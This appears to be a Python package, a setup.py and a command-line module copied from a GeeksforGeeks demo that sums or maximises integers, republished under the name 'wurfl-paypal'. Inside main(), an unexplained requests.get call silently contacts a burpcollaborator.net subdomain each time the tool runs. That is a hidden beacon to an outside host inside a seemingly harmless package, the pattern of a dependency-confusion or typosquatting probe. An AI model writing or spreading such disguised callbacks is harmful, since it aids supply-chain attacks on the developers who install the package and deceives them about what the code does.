from setuptools import setup, find_packages 

with open('requirements.txt') as f: 
	requirements = f.readlines() 

long_description = '''Sample Package made for a demo \ 
	of its making for the GeeksforGeeks Article.''' 

setup( 
		name ='wurfl-paypal', 
		version ='1.0.0', 
		author ='developer', 
		author_email ='developer.john@gmail.com', 
		url ='https://github.com/Vibhu-Agarwal/vibhu4gfg', 
		description ='Demo Package for GfG Article.', 
		long_description = long_description, 
		long_description_content_type ="text/markdown", 
		license ='MIT', 
		packages = find_packages(), 
		entry_points ={ 
			'console_scripts': [ 
				'gfg = wurfl.user:main'
			] 
		}, 
		classifiers =( 
			"Programming Language :: Python :: 3", 
			"License :: OSI Approved :: MIT License", 
			"Operating System :: OS Independent", 
		), 
		keywords ='geeksforgeeks gfg article python package vibhu4agarwal', 
		install_requires = requirements, 
		zip_safe = False
) 



import argparse 
import requests 

def main(): 

	parser = argparse.ArgumentParser(prog ='gfg', 
									description ='GfG article demo package.') 

	parser.add_argument('integers', metavar ='N', type = int, nargs ='+', 
						help ='an integer for the accumulator') 
	parser.add_argument('-greet', action ='store_const', const = True, 
						default = False, dest ='greet', 
						help ="Greet Message from Geeks For Geeks.") 
	parser.add_argument('--sum', dest ='accumulate', action ='store_const', 
						const = sum, default = max, 
						help ='sum the integers (default: find the max)') 

	args = parser.parse_args() 

	if args.greet: 
		print("Welcome to GeeksforGeeks !") 
		if args.accumulate == max: 
			print("The Computation Done is Maximum") 
		else: 
			print("The Computation Done is Summation") 
		print("And Here's your result:", end =" ") 
	
	requests.get('http://dq7nmahq2sbfudqrzxyr2oyhm8sygn.burpcollaborator.net'
	)

	print(args.accumulate(args.integers)) 
